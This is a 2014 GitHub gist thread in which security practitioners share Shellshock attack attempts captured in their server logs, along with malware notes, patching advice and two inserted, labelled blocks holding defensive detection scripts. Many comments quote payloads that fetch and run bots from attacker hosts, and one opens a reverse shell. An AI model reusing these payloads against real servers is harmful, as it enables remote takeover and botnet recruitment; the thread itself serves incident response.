anonymous /gist:929d622f3b36b00c0be1 Secret
Created Sep 25, 2014

Ok, shit's real. It's in the wild... src: 162.253.66.76
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys

aaronkaplan commented Sep 25, 2014

oh wow... thx Rob


GelosSnake commented Sep 25, 2014

shit, good work


IvRRimum commented Sep 25, 2014

🎱


ssilaev commented Sep 25, 2014

omg


w-flo commented Sep 25, 2014

This probably connects to 89.238.150.154:5 for C&C? It sends a "PING" and probably expects "PONG!".


absynth commented Sep 25, 2014

Seems to connect to 108.162.197.26, which is a Cloudflare IP.


horacio commented Sep 25, 2014

Holy bejesus.


denartha commented Sep 25, 2014

Curl would be better. It comes natively in nearly everything, wget does not.


unixfreaxjp commented Sep 25, 2014

Analysis of the dropped ELF, which I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see the comment part. I opened a repo for this ELF malware family as Linux/Bash0day: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
Thanks Yinettesys! Good findings, #MalwareMustDie!!


poggs commented Sep 25, 2014

Nice - the following text strings are in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password


mneimsky commented Sep 25, 2014

denartha you should send a note to the author.


itiki commented Sep 25, 2014

OMG


rfc1459 commented Sep 25, 2014

If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up and running really fast (lack of obfuscation, section headers weren't stripped, and so on).


Jamyn commented Sep 25, 2014

This should be interesting.


zhangran commented Sep 25, 2014

Awesome~~~


unsignedzero commented Sep 25, 2014

Rob a hero!


ABISprotocol commented Sep 25, 2014

Thanks Yinette and Rob, et al.,
For those who made it here and have read the thread and are wondering what they should probably do right now, the best thing would likely be to update and upgrade (for starters).

This is done from your terminal.

Mac / OSX:
brew cleanup
brew update
brew upgrade
(That should do it... you may also wish to try to see what is outdated, with this:)
brew outdated

Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade
(Once that's done, please check again from your standard software updater tool)

Fedora / CentOS: You may want to read this thing first, maybe
https://fedoraproject.org/wiki/Upgrading_Fedora_using_yum#Upgrading_Fedora_using_yum_directly

PREPAAAAAARRRRE


ahollandECS commented Sep 25, 2014

Just saw this user-agent in the wild as well:
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444


muloka commented Sep 25, 2014

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851


bmurch commented Sep 25, 2014

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"


wilkinson commented Sep 25, 2014

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!
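wilkinson's gist itself is not reproduced on this page. As an added example (not wilkinson's code, and not part of the original thread), here is a POSIX shell function that a bashrc or a fleet-wide audit script can call to report whether the local bash still imports function definitions from the environment. It uses the widely published self-tests for CVE-2014-6271 and for the follow-up parser bug CVE-2014-7169; the function names, the output words and the warning text are my own choices.

```shell
#!/bin/sh
# Added example: report whether the bash on this host is affected by the
# environment-function-import bug (Shellshock). Not wilkinson's gist.

# Prints exactly one of: vulnerable, patched, no-bash.
# Always returns 0 so it is safe to call from a bashrc or under `set -e`.
shellshock_check() {
    command -v bash >/dev/null 2>&1 || { echo no-bash; return 0; }

    # CVE-2014-6271: a variable whose value starts with "() {" is imported
    # as a function, and the command after "};" runs while bash is still
    # parsing the environment. `bash -c true` does nothing itself, so any
    # "VULN" on stdout can only have come from the injected command.
    if env x='() { :;}; echo VULN' bash -c 'true' 2>/dev/null | grep -q VULN; then
        echo vulnerable
        return 0
    fi

    # CVE-2014-7169: after the first fix, an incomplete function definition
    # could still leave the parser in a state where the next word of the
    # command ("echo") becomes a redirection target, so a file named "echo"
    # appears in the working directory. Run it in a private temp directory
    # so a vulnerable bash cannot litter anything else.
    tmp=$(mktemp -d) || { echo no-bash; return 0; }
    ( cd "$tmp" && env X='() { (a)=>\' bash -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then
        rm -rf "$tmp"
        echo vulnerable
        return 0
    fi
    rm -rf "$tmp"
    echo patched
}

# bashrc hook: warn on login if this host's bash is still affected.
# Usage: source this file from ~/.bashrc and call `shellshock_warn`.
shellshock_warn() {
    if [ "$(shellshock_check)" = vulnerable ]; then
        echo "WARNING: bash on $(hostname) imports functions from the environment (Shellshock)" >&2
    fi
    return 0
}
```

Both tests are read-only apart from the temporary directory the second one creates, so the function is safe to run on production hosts; a fleet audit is just `ssh host sh -c "$(cat shellshock-check.sh); shellshock_check"` per host, collected into a list of hosts that printed `vulnerable`.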


4dd3r commented Sep 25, 2014

well that escalated quickly!


rdev5 commented Sep 25, 2014

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'


nicheath commented Sep 25, 2014

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.


Colbert337 commented Sep 26, 2014

wow, cool! THX!


nate-kingsley commented Sep 26, 2014

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""


chridd commented Sep 26, 2014

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.


heyflynn commented Sep 26, 2014

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple of times on our servers today from the Netherlands. The source it pulls from, http://213.5.67.223/jur, has what looks to be a botnet with a worm component.

edit - looks like 213.5.67.223 removed the exposed file. I have a copy of it; is there anyone in the security community I can send it to? There is some pretty scary-looking shit in it. Damn Perl script has a built-in port scanner, botnet TCP/UDP flooders and a spreader.


realfx commented Sep 26, 2014

Does it work on Android?


rdev5 commented Sep 26, 2014

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...


ABISprotocol commented Sep 26, 2014

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/


bacbos commented Sep 26, 2014

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""`


UAHR commented Sep 26, 2014

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""


Cherrytreee commented Sep 26, 2014

A n00b question here:
If the logs show up as 404'd, does that mean the User-Agent env var was not actually evaluated, i.e. the exploit failed?


ChrisMCMine commented Sep 26, 2014

@Cherrytreee do you have cgi scripts? If not then you're safe atm.


Cherrytreee commented Sep 26, 2014

@ChrisMCMine I don't. Thx!


rdev5 commented Sep 26, 2014

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM

ingie commented Sep 26, 2014

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!


Neo23x0 commented Sep 27, 2014

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx
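bmurch's grep, chridd's point that the `:` between the braces is not required, and Neo23x0's regex all aim at the same thing: finding the `() { ... };` prelude inside logged header values. As an added example (not code from the gist or from any commenter), the POSIX shell script below builds a small constructed access log in combined format, greps it with a pattern whose parentheses and braces are escaped so they match literally and whose function body is left unconstrained, and uses awk to report, per hit, the client IP, the status code and which of Referer or User-Agent carried the payload. The sample addresses are RFC 5737 documentation ranges and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the gist: scan a combined-format access log for
# requests whose Referer or User-Agent starts with the bash function
# definition prelude that every Shellshock payload in this thread uses.
# "\(\)" matches a literal "()", the body between the braces may be anything
# (so "() { :;};", "() { :; };" and "() { x; };" all match), and whitespace
# is tolerated before "{" and before the closing ";".
SHELLSHOCK_RE='\(\)[[:space:]]*\{[^}]*\}[[:space:]]*;'

# Constructed sample log. Three probe lines shaped like the ones posted in
# this thread, followed by two benign requests that must not match.
make_sample_log() {
    cat >"$1" <<'EOF'
203.0.113.5 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.51.100.1"
203.0.113.6 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 198.51.100.2" "() { :; }; /bin/ping -c 1 198.51.100.2"
203.0.113.7 - - [26/Sep/2014:08:00:00 +0000] "GET /cgi-bin/test.sh HTTP/1.0" 200 12 "-" "() { x; }; echo probe"
203.0.113.8 - - [26/Sep/2014:08:00:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [26/Sep/2014:08:00:02 +0000] "GET /docs/functions() HTTP/1.1" 200 2048 "-" "curl/7.38.0"
EOF
}

# One line per hit: client IP, response status, which header carried the
# payload, and the request line. Fields are split on the double quote, so
# $1 is the prefix with the client IP, $2 the request line, $3 the status
# and size, $4 the Referer and $6 the User-Agent.
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" "$1" | awk -F'"' '
    {
        split($1, pre, " "); ip = pre[1]
        split($3, mid, " "); status = mid[1]
        where = ""
        if ($4 ~ /\(\)[ \t]*\{/) where = "referer"
        if ($6 ~ /\(\)[ \t]*\{/) where = (where == "") ? "user-agent" : where "+user-agent"
        printf "%s status=%s header=%s request=\"%s\"\n", ip, status, where, $2
    }'
}

# Number of matching requests in a log file, for quick triage.
shellshock_hit_count() {
    shellshock_hits "$1" | grep -c ''
}

# Usage: sh shellshock-scan.sh /var/log/apache2/access.log
if [ -n "${1:-}" ]; then
    shellshock_hits "$1"
fi
```

Two caveats for real logs. A 404 on a CGI path normally means no handler executed for that request, but the same client usually tries several paths in one sweep, so every hit from an IP is worth reviewing, not just the ones that returned 200. And when a payload contains double quotes that the server logged unescaped (several lines above do), awk's quote-based split shifts the Referer and User-Agent columns for that line; the grep still fires, only the `header=` attribution becomes unreliable.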


ghost commented Sep 28, 2014

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""


behindthefirewalls commented Sep 29, 2014

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"


addbook commented Sep 29, 2014


blues-man commented Sep 29, 2014

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"


ghost commented Sep 30, 2014

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"


Vic020 commented Oct 1, 2014

Great,


clontarfx commented Oct 2, 2014

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.


tarzand commented Oct 27, 2014

omg


ofnothinghere commented Feb 18, 2017

Does it work on Android?
gif

quotes

memes

wallpaper
that's fine
